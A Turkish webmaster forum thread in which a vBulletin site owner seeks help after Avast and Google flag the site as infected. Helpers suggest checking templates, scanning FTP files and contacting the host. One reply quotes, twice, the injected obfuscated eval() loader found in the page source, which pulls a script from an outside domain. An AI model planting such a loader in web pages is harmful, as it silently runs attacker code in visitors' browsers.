lostyazilim

Avast virüs programı kullanan 1 kişi bakabilirmi.

26 Mesajlar 3.470 Okunma
lstbozum
wmaraci reklam

Melek Melek Sms Onayı Gerekli Banlı Kullanıcı
  • Üyelik 09.12.2010
  • Yaş/Cinsiyet 34 /
  • Meslek
  • Mesajlar 781
  • Beğeniler 224 / 218
  • Ticaret 1, (%100)

polathinyo adlı üyeden alıntı

Fullbackup yükledik hocam.
Zaten sadece msql değiştirmek mümkün değil bayağı büyük 300mb yaklaşık.
Herşeyi sildik tam 1 ay öncesine dönderdik siteyi.
Yine virüs var, yine uğraştırıcak bizi lanet olası şey.
İlgiliniz için teşekkür ederim hocam eyvallah.

Öncelikle kolay gelsin.. Sitenin kaynak kodlarına baktığımda virüs olarak belirtilen adres şurda görünüyor

Forum Renkli - Türkiye'nin En Renkli Arkadaşlık, Dostluk, Paylaşım, Oyun, Msn, Facebook, İnternet, Şiir, Resim, Video, Sinema, Sağlık, Moda, Güncel Haberler ve Ödüllü Yarışmalar Forumu

<script>eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3 1=4.5(\'6\');1.7=\'8://9-a.b/c.d.1\';3 2=4.e(\'2\')[0];2.f(1);',16,16,'|js|head|var|document|createElement|script|src|http|javascript|collection|in|jquery|compatibility|getElementsByTagName|appendChild'.split('|'),0,{}))</script>

tam site başlığının altında. Acaba header şablonunu kontrol eder misiniz? Oranın en altında şifreli bir kod olma olasılığı yüksek gibi duruyor :)

wmaraci
reklam

bassedas bassedas WM Aracı Kullanıcı
  • Üyelik 20.12.2011
  • Yaş/Cinsiyet 43 / E
  • Meslek öğrenci
  • Mesajlar 200
  • Beğeniler 22 / 45
  • Ticaret 1, (%100)

PSiKoMaNYaH adlı üyeden alıntı

Avast kullanıyorum uyarı falan vermedi. Google'da o uyarının düzelmesi için sitenizin tekrar değerlendirilmesini form aracılığı ile iletmeniz lazım sanırım. Eskiden benim başıma gelmişti bu sorun öyle halletmiştim :)

Ek Olarak: Google uyarısını yok sayıp devam ettiğimde avast "dın dın dın :D" şeklinde öterek bu uyarıyı verdi.

aynısı bende de çıktı

polathinyo polathinyo WM Aracı Kullanıcı
  • Üyelik 06.02.2012
  • Yaş/Cinsiyet 32 / E
  • Meslek SEO | Web Tasarım
  • Konum İstanbul Avrupa
  • Ad Soyad H** P**
  • Mesajlar 242
  • Beğeniler 43 / 37
  • Ticaret 58, (%97)

Öncelikle kolay gelsin.. Sitenin kaynak kodlarına baktığımda virüs olarak belirtilen adres şurda görünüyor

Forum Renkli - Türkiye'nin En Renkli Arkadaşlık, Dostluk, Paylaşım, Oyun, Msn, Facebook, İnternet, Şiir, Resim, Video, Sinema, Sağlık, Moda, Güncel Haberler ve Ödüllü Yarışmalar Forumu

<script>eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3 1=4.5(\'6\');1.7=\'8://9-a.b/c.d.1\';3 2=4.e(\'2\')[0];2.f(1);',16,16,'|js|head|var|document|createElement|script|src|http|javascript|collection|in|jquery|compatibility|getElementsByTagName|appendChild'.split('|'),0,{}))</script>

tam site başlığının altında. Acaba header şablonunu kontrol eder misiniz? Oranın en altında şifreli bir kod olma olasılığı yüksek gibi duruyor :)

Baktım hocam ama hiç bir şüpheli kod göremedim ben malesef.

header;

forumrenkli

$vboptions[bbtitle]
$ad_location[ad_header_logo] 

herseycanli

$spacer_open

$_phpinclude_output

$ad_location[ad_header_end]

• Üyelik 09.12.2010
  • Yaş/Cinsiyet 34 /
  • Meslek
  • Mesajlar 781
  • Beğeniler 224 / 218
  • Ticaret 1, (%100)

Baktım hocam ama hiç bir şüpheli kod göremedim ben malesef.

Headinclude şablonuna da bakar mısınız acaba? Uzun zaman oldu vBulletin kullanmayı şablon ismini yanlış yazmış olabilirim kusura bakmayın :) Ayrıca eklentilerinizi vbulletin.org sitesinden indirmeye dikkat edin. Eğer orda da kod yoksa eğer temanızı değiştirebilir misiniz? Eğer uyarı vermezse temada virüs olduğu kesinleşir :)

wmaraci
wmaraci

• Üyelik 06.02.2012
  • Yaş/Cinsiyet 32 / E
  • Konum İstanbul Avrupa
  • Ad Soyad H** P**
  • Mesajlar 242
  • Beğeniler 43 / 37
  • Ticaret 58, (%97)

Headinclude şablonuna da bakar mısınız acaba? Uzun zaman oldu vBulletin kullanmayı şablon ismini yanlış yazmış olabilirim kusura bakmayın :) Ayrıca eklentilerinizi vbulletin.org sitesinden indirmeye dikkat edin. Eğer orda da kod yoksa eğer temanızı değiştirebilir misiniz? Eğer uyarı vermezse temada virüs olduğu kesinleşir :)

Onada baktım hocam ama yok öyle yabancı bir kod.
Şuanda default yeni tema ekledim.
Sizide yorduk ama kusura bakmayın hocam (:
Valla bizde 1 haftadır uğraşıyoruz verem olduk.

• Üyelik 09.12.2010
  • Yaş/Cinsiyet 34 /
  • Meslek
  • Mesajlar 781
  • Beğeniler 224 / 218
  • Ticaret 1, (%100)

Onada baktım hocam ama yok öyle yabancı bir kod.
Şuanda default yeni tema ekledim.
Sizide yorduk ama kusura bakmayın hocam (:
Valla bizde 1 haftadır uğraşıyoruz verem olduk.

Değişen bir şey olmadı. Ftpyi komple bilgisayarınıza çekeren taratıp virüs bulaşmış dosyaları tespit etmekten başka çareniz yok sanırım. Çok geçmiş olsun 2 kez başıma geldi virüsün nerde olduğunu tespit edene kadar canım çıkmıştı resmen :)

• Üyelik 06.02.2012
  • Yaş/Cinsiyet 32 / E
  • Konum İstanbul Avrupa
  • Ad Soyad H** P**
  • Mesajlar 242
  • Beğeniler 43 / 37
  • Ticaret 58, (%97)

Değişen bir şey olmadı. Ftpyi komple bilgisayarınıza çekeren taratıp virüs bulaşmış dosyaları tespit etmekten başka çareniz yok sanırım. Çok geçmiş olsun 2 kez başıma geldi virüsün nerde olduğunu tespit edene kadar canım çıkmıştı resmen :)

Hocam onuda denedim ama yine yok.
Zaten forumu eskiye çevirmeden önce denemiştim microsoft security, eset, avast hepsiyle denemiştim virüs yok ftp dosyasında.
Hatta bilgisayarı çökertiyodu avast zor kurtardın :D
Yine forumu geriye almaktan başka bi çağremez kalmadı malesef.

İlginiz için tüm arkadaşlarada teşekkür ederim.

• Üyelik 09.12.2010
  • Yaş/Cinsiyet 34 /
  • Meslek
  • Mesajlar 781
  • Beğeniler 224 / 218
  • Ticaret 1, (%100)

Hocam onuda denedim ama yine yok.
Zaten forumu eskiye çevirmeden önce denemiştim microsoft security, eset, avast hepsiyle denemiştim virüs yok ftp dosyasında.
Hatta bilgisayarı çökertiyodu avast zor kurtardın :D
Yine forumu geriye almaktan başka bi çağremez kalmadı malesef.

İlginiz için tüm arkadaşlarada teşekkür ederim.

:D Son bir çözüm sunayım size hosting firmasıyla görüşmeyi denediniz mi acaba? Siteme son bulaşan virüs sağolsun ben sildim o tekrar geri geldi hostgatordan 3,4 kez destek talebi açtım virüsleri taradılar sildiler 5. de artık "aaaa yiter artık ver parasını taratalım silelim virüsleri" dediler :p Firmaya durumu açıklarsanız size yardımcı olabilirler belki..

• Üyelik 06.02.2012
  • Yaş/Cinsiyet 32 / E
  • Konum İstanbul Avrupa
  • Ad Soyad H** P**
  • Mesajlar 242
  • Beğeniler 43 / 37
  • Ticaret 58, (%97)

:D Son bir çözüm sunayım size hosting firmasıyla görüşmeyi denediniz mi acaba? Siteme son bulaşan virüs sağolsun ben sildim o tekrar geri geldi hostgatordan 3,4 kez destek talebi açtım virüsleri taradılar sildiler 5. de artık "aaaa yiter artık ver parasını taratalım silelim virüsleri" dediler :p Firmaya durumu açıklarsanız size yardımcı olabilirler belki..

Host ile sürekli bağlantıdayız zaten hocam, tüm işlemleri veraber yapıyoruz ama o bana sizinki gibi bir teklif sunmadı :D bilmiyorum yani.
Ama yarın gelsin konuşurum.

• Üyelik 09.12.2010
  • Yaş/Cinsiyet 34 /
  • Meslek
  • Mesajlar 781
  • Beğeniler 224 / 218
  • Ticaret 1, (%100)

Host ile sürekli bağlantıdayız zaten hocam, tüm işlemleri veraber yapıyoruz ama o bana sizinki gibi bir teklif sunmadı :D bilmiyorum yani.
Ama yarın gelsin konuşurum.

Yeni bir sektör açılsa fena olmaz hani parası neyse verelim temizlensin virüsler. Bir zaman sonra insan uğraşmaktan bıkıyor artık :D Dilerim ki benim gibi 1,2 ay uğraşmazsınız bu sorunlar biran önce halledersiniz sorunu :)

wmaraci
Konuyu toplam 3 kişi okuyor. (0 kullanıcı ve 3 misafir)
Site Ayarları
  • Tema Seçeneği
  • Site Sesleri
  • Bildirimler
  • Özel Mesaj Al